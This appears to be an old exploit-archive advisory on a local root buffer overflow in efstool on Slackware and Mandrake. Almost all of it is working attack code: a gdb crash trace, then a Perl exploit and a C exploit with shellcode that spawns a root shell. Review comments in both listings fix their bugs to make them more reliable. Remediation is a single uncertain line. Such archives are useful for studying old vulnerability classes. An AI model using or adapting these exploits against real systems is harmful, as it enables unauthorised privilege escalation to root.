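COMMAND
efstool local root exploit (buffer overflow)

SYSTEMS AFFECTED
slackware 8, mandrake 8, mandrake 7.1

PROBLEM
clorox 'max' says :

An error in the efstool program on redhat, mandrake, and slackware is able to be successfully exploited through a buffer overflow.

[clorox@ptnw clorox]$ efstool `perl -e 'print "A" x 3000'`
Segmentation fault
[clorox@ptnw clorox]$ gdb efstool
GNU gdb 5.1.1
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp 0xbfffe890 0xbfffe890
(gdb)

Example
=======

#!/usr/bin/perl
# efstool root exploit
# written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp)
# give the campers internet grogan!
#
# tested to work on slackware 8, mandrake 8, mandrake 7.1
# tweaks may be needed on the offset
# method 1 works more often but
# method 2 is faster but not too good
#
# enjoy -clorox
# perl efs.pl -1000 m1
#
# NOTE(review): three corrections to the published listing, none of
# which change the payloads themselves:
#   - $ret was the *string* "0xbfffe890". Perl does not parse a "0x"
#     prefix in numeric context, so ($ret + $offset) evaluated to
#     $offset alone and the packed return address was garbage. It is
#     now a numeric literal.
#   - exec("efstool $buffer") handed a single string to Perl, which
#     either passes it to /bin/sh (the m1 payload contains 0x29 ')',
#     a shell metacharacter) or word-splits it itself; both corrupt
#     the argument. The list form passes $buffer as one argv entry
#     with no shell involved.
#   - an unknown method fell through and exec'd an empty buffer; it
#     now prints the usage and exits.
use strict;
use warnings;

# Payload bytes are reproduced exactly from the original listing.
my $shellcode =
    "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
    "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
    "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
    "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
    "/bin/sh";

my $shellcode2 =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
    "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
    "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
    "\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
    "\xff\xff/bin/sh";

# Base return address: the %esp value gdb reported at the crash
# ("info reg esp" above). Must be a number, not a string.
my $ret = 0xbfffe890;
my $nop = "\x90";

my ($offset, $method) = @ARGV;

if (!defined $offset || $offset !~ /^-?\d+$/ || !defined $method) {
    print "perl $0 <offset> m1 or m2\n";
    exit 1;
}

my $buffer;
if ($method eq "m1") {
    # 3000 bytes total: NOP sled, then the payload. The overflow needs
    # roughly this much before the saved return address is reached.
    my $len = 3000;
    $buffer  = $nop x ($len - length($shellcode));
    $buffer .= $shellcode;
} elsif ($method eq "m2") {
    # Sled sized from the m1 payload length, as in the original listing.
    my $len = 10010;
    $buffer  = $nop x ($len - length($shellcode));
    $buffer .= $shellcode2;
} else {
    print "You must specify a method fool!\n";
    print "perl $0 <offset> m1 or m2\n";
    exit 1;
}

# Guessed address of the sled, written twice so that a small
# misalignment still lands on it. 'l' packs a native 32-bit long on
# the i386 targets this was written for.
$buffer .= pack('l', ($ret + $offset)) x 2;

# List form: one argv entry, no shell, no word splitting.
exec("efstool", $buffer) or die "exec efstool: $!\n";

-Or-

/* efstool.c - efstool/bof simple overflow in efstool,
 *
 *
 * This code is published propterty of CloudAss, you may
 * duplicate this in any shape or form without prior written
 * permission from CloudAss.
 *
 * Bug discovered by ntfx, just figured I'd code a decent
 * exploit for it.
 *
 *
 * DISCLAIMER - I am in no way affiliated with ntfx or any members of
 * soldierx or legion2002 security.
 *
 * Usage: ./efsroot offset - bruteforce if neccesary
 *
 * Bug is pretty stupid, and simple, I have yet to see it give root.
 * efstool is not +s on slackware 8.0 , it should spawn a shell
 * regardless.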
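*
 * (C) COPYRIGHT CloudAss , 2002
 * all rights reserved
 ***********************************************************************
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* execl(); was implicitly declared in the original */

#define SIZE 3000
#define NOP  0x90
/*
 * Path of the target binary. This differs per distribution: the gdb
 * session at the top of this advisory ran /usr/bin/efstool, the original
 * listing used the GNOME prefix below. Adjust before use.
 */
#define PATH "/opt/gnome/bin/efstool"

/*
 * Return the current stack pointer.
 *
 * i386-only: the inline asm reads %esp, so it does not build on non-x86
 * targets and on x86-64 it yields only the low 32 bits of %rsp. The value
 * is handed out through an explicit output operand; the original had no
 * return statement and relied on %eax still holding the value when the
 * function fell off its end, which is undefined behaviour.
 */
long get_esp(void)
{
    unsigned int sp;

    __asm__ volatile ("movl %%esp, %0" : "=r"(sp));
    return (long)sp;
}

/*
 * Payload, byte-for-byte from the original listing. The first 8 bytes
 * decode as xor eax,eax / xor ebx,ebx / mov al,0x17 / int 0x80 (syscall 23
 * on i386 Linux, setuid(0)); the rest is a classic execve("/bin/sh")
 * stub. It contains no NUL byte, so strlen() gives its length and it
 * survives being passed through argv.
 */
char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Build the overflow buffer and exec the target with it as argv[1].
 *
 * argv[1] is a signed decimal offset added to our own %esp to guess where
 * the NOP sled lands in the target's stack (bruteforce it if needed).
 *
 * Buffer layout, as in the original: [NOP sled][shellcode][retaddr ...],
 * the sled being exactly as long as the shellcode.
 *
 * Fixes relative to the original listing:
 *   - argc is checked and the offset parsed with strtol(); atoi(argv[1])
 *     with no argument dereferenced NULL.
 *   - the buffer is NUL-terminated. The original wrote all SIZE bytes and
 *     let execl() read past the array looking for a terminator.
 *   - return-address words are stored as 32-bit values via memcpy rather
 *     than a (long *) store, which is 8 bytes wide on LP64 and makes
 *     alignment/aliasing assumptions.
 *   - execl()'s argument list is terminated with (char *)NULL, not int 0.
 *   - a failed execl() is reported instead of silently returning 0.
 */
int main(int argc, char *argv[])
{
    char buffer[SIZE + 1];
    uint32_t retaddr;
    long offset;
    char *end;
    size_t i, sclen;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <offset>  (bruteforce the offset if necessary)\n",
                argv[0]);
        return 1;
    }

    errno = 0;
    offset = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE) {
        fprintf(stderr, "%s: offset '%s' is not a decimal integer\n",
                argv[0], argv[1]);
        return 1;
    }

    /* Target is an i386 process: the address is a 32-bit quantity. */
    retaddr = (uint32_t)(get_esp() + offset);

    /* Fill the whole buffer with the guessed return address. */
    for (i = 0; i + sizeof retaddr <= SIZE; i += sizeof retaddr)
        memcpy(buffer + i, &retaddr, sizeof retaddr);

    /* Sled, then payload, over the start of the buffer. */
    sclen = strlen(shellcode);
    memset(buffer, NOP, sclen);
    memcpy(buffer + sclen, shellcode, sclen);
    buffer[SIZE] = '\0';

    execl(PATH, "efstool", buffer, (char *)NULL);

    /* execl() only returns on failure. */
    perror("execl " PATH);
    return 1;
}

SOLUTION
Updated package available ?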